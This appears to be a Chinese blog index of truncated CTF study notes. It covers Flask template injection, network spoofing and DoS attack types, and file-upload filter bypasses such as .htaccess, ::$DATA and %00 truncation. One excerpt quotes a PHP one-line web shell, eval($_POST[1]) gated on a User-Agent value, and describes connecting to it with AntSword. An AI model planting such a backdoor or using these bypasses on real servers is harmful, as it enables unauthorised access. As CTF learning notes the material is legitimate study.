qq_45655136的博客

刷题网站:bugku;BUUCTF本文记录了在刷题过程中所学到的知识点坚持每天刷5道题，持续更新坚持就是胜利鸭CTF1、bugku–Simple_SSLI_1根据题目SSLI即服务端模板注入攻击，服务段接收用户输入，将其作为web应用模板的一部分，渲染编译后执行恶意内容，导致敏感信息泄露、代码执行等。直接F12，发现提示in the flask,set a secret_keyflask模板，config是flask模板中的一个全局对象，包含了所有应用程序的配置值。然后在url输入/?fl

1.IP欺骗攻击单向攻击：但是TCP处理程序会在自己认为的异常时刻发送RST包，表示复位用来异常的关闭连接源路由攻击：利用了IP数据包的源路由选择机制来控制数据包转发路径进而监听TCP会话劫持：在一次正常的通信中，攻击者作为第三方插入其中，可以对会话监听，也可以插入其中。不仅可以实现监听，而且可以绕过口令实现口令破解和身份认证方法：1）IP地址伪造技术2）SYN Flood3）TCP序列号猜测技术2、ARP欺骗攻击ARP是根据IP地址获取物理地址(mac)的一个TCP

DDos攻击1.拒绝服务攻击Dos2.带宽攻击：以极大的通信量冲击网络3.连通性攻击：以大量的连接请求冲击计算机4.直接攻击ping of deathsyn flood：防御（缩短SYN timeout时间，设置SYN cookie)tcp连接请求洪水攻击UDP风暴攻击5.分布式拒绝服务攻击DDOS6.肉鸡：常指被黑客控制的机器7.拖库，洗库，撞库8.netstat命令用于显示与IP，TCP，UDP和ICMP协议相关的统计数据，一般用于检测本机各端口的网络连接情况9.泪滴攻击

用d盾扫描后，发现存在后门，打开.config.php文件、、、<?phpif (@$_SERVER['HTTP_USER_AGENT'] == 'flag'){ eval($_POST[1]);}?>、、、发现这个就是对一句话木马的报头有一个User-Agent限制，改成flag，然后用蚁剑连接就可以了，密码为1...

目录一、客户端二、服务端1.MIME-Type验证2黑名单认证1.后缀名2..htaccess3..user.ini4.大小写绕过5.空格绕过６.点号绕过　可以看到黑名单里没有下面的这个函数对＂．＂处理，利用Windows特性，会自动去掉后缀名中最后的“．＂，可在后缀名中加“．＂绕过；７.：：＄ＤＡＲＡ绕过８.点号绕过拼接并绕过前面的两次过滤９．双写绕过二、白名单认证１.GET型％００截断，２.ｐｏｓｔ型％００一、客户端1.使用b...